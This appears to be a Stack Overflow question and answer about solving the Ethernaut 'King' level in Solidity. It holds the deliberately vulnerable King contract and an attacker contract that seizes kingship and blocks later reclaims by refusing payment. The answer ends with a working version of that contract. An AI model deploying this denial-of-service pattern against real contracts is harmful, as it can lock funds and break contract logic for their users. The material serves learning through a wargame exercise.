# payable(address).transfer(value) runs out of gas

Tags: solidity, remix, foundry

I am playing the openzeppelin Ethernaut challenges.  The king challenge, requires to become king and not let the other contract reclaim kingship:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {console} from 'forge-std/Script.sol';

contract King {

  address king;
  uint public prize;
  address public owner;

  constructor() payable {
    owner = msg.sender;  
    king = msg.sender;
    prize = msg.value;
  }

  receive() external payable {
    require(msg.value >= prize || msg.sender == owner);
    payable(king).transfer(msg.value);
    king = msg.sender;
    prize = msg.value;
  }

  function _king() public view returns (address) {
    return king;
  }
}
```

My idea to solve it is having a contract claim ownership and not have a receive function so the reclaiming will fail.

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {console} from 'forge-std/Script.sol';

contract Ursurpur {
    constructor() payable {
     }

     function send_ransom(address _king) public payable {

        (bool success, bytes memory err) = payable(_king).call{value: address(this).balance}("");
        console.log(string(err));  // returns ""
        require(success, "Transfer failed...why?.");
     }

}
```

The problem is that when the king contract tries to send back the funds to the previous king with `payable(king).transfer(msg.value);` the function reverts.  If I modify the king receive function to:

```
- payable(king).transfer(msg.value);
+ (bool success, bytes memory err) = payable(king).call{value: msg.value}("");
```

The process works.

I tried having the Ursurpur contract transfer funds via transfer but that reverts with OutOfGas.  I have tried this in Remix and in Foundry.  I can transfer funds to the king contract via my wallet but not via the contract.

Answer (score 0):

When you're calling the `send_ransom()` function of **Ursurpur** contract by passing the address of the **King** contract, then this line is executed:

```js
(bool success, bytes memory err) = payable(_king).call{value: address(this).balance}("");
```

Which is basically transferring the `balance` of the **Ursurpur** contract plus the `value` that you attach while calling the `send_ransom()` function. As, the `balance` is `0`, so only the `value` is being transferred.

As, you've mentioned that you want to transfer the funds to the previous king (i.e., the **King** contract). But, when the `send_ransom()` function is executed by passing the address of the **King** contract as param, the corresponding `receive()` function is triggered, which is checking for this **OR** condition:

```js
require(msg.value >= prize || msg.sender == owner);
```

So, in order to proceed with the execution, we need to fulfil either of these conditions.

As, the `receive()` function is being triggered via the `send_ransom()` function of the **Ursurpur** contract, so the `msg.sender` is the address of the **Ursurpur** contract (i.e., not the owner/deployer of the **King** contract). So, we can never fulfil the second condition(i.e., `msg.sender == owner`), when triggering it via the contract.

But, we can fulfil the first condition (i.e., `msg.value >= prize`), by attaching any amount of Wei/Eth (as `value` while calling the `send_ransom()` function) greater than or equal to the value of `prize` variable of the **King** contract.

So, if we fulfil that condition, the next line that is executed is:

```js
payable(king).transfer(msg.value);
```

Here, when we're executing this for the first time, the `king` variable is holding the **account/wallet** address of the **deployer**. So, if you've called the `send_ransom()` using the same account, then whatever `value` you've attached to it is getting transferred back to the same account (resulting in almost no change in the balance of the account, except the gas fees).

But, from the second time onwards, the transaction will revert because the `king` variable will be holding the address of the **Ursurpur** contract, (i.e., being assigned using `king = msg.sender;`), and the **Ursurpur** contract is not having any `receive()` function.

Since, you're expecting the `value` to be transferred to the **King** contract, then you can simply remove that line from the `receive()` function of the **King** contract:

```js
p̶a̶y̶a̶b̶l̶e̶(̶k̶i̶n̶g̶)̶.t̶r̶a̶n̶s̶f̶e̶r̶(̶m̶s̶g̶.v̶a̶l̶u̶e̶)̶;̶
```

**P.S.**, if you're using the `.call` one, you've to remove that too:

```js
(̶b̶o̶o̶l̶ s̶u̶c̶c̶e̶s̶s̶, b̶y̶t̶e̶s̶ m̶e̶m̶o̶r̶y̶ e̶r̶r̶)̶ =̶ p̶a̶y̶a̶b̶l̶e̶(̶k̶i̶n̶g̶)̶.c̶a̶l̶l̶{̶v̶a̶l̶u̶e̶:̶ m̶s̶g̶.v̶a̶l̶u̶e̶}̶(̶"")̶;̶
```

As, the funds are already getting transferred to the **King** contract via this line of `send_ransom()` function:

```js
(bool success, bytes memory err) = payable(_king).call{value: address(this).balance}("");
```

Also, if you're willing to utilise the balance of the **Ursurpur** contract in this (i.e., by transferring funds explicitly to the **Ursurpur** contract, so that the same can be added to the `value` while calling the function), then you might need to add the `receive()` function in this contract as well.

Otherwise, you can just replace the `address(this).balance` with `msg.value`, i.e.,:

```js
(bool success, bytes memory err) = payable(_king).call{value: msg.value}("");
```

---

As per the [Ethernaut challenge](https://ethernaut.openzeppelin.com/level/9) (i.e., when we can't alter the **King** contract, instead we've to avoid proclamation of the kingship), the correct code for the **Ursurpur** contract would be:

```js
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Ursurpur {

    function send_ransom(address _king) public payable {
        (bool success, bytes memory err) = payable(_king).call{
            value: msg.value
        }("");
        require(success, "Transfer failed...why?.");
    }
}
```

When you use the **King** contract address as a param to call the `send_ransom()` function and attach any `value` greater than `prize`. After that, when you submit the instance, the level will be cleared:

[image]

Comment: Thanks for the comments, a few clarifications.  I cannot modify the King contract it is deployed already.  I modified it in a test environment to see if it would pass changing the transfer functionality, which it did (in the test environment) When I create the Ursurpur contract I send it enough ethers to cover the prize and more.  The king contract is deployed with an independent owner and the original king address is independent of mine.

In Summary: I can't change the King contract, if I could and I change the transfer to a call, it works in test environment.  Ursurpur has enough Eths.

Comment: Okay, @CesarGarcia. Few questions: **1.** As, the King contract is not created/deployed by you. So, can you please confirm that its code is the exact same as what you’ve mentioned in the question? **2**. And, the goal is to transfer the funds to the King contract using `send_ransom()` function? **3**. And, you’ve full control over the Ursurpur contract. Right?

Comment: Yes, then the creator of the King contract tries to claim being King but since Ursurpur does not have a receive function he can't and I win.  See rules here https://ethernaut.openzeppelin.com/level/9

Comment: Added the [Ethernaut challenge](https://ethernaut.openzeppelin.com/level/9) scenario and the corresponding code for **Ursurpur** contract. Please check.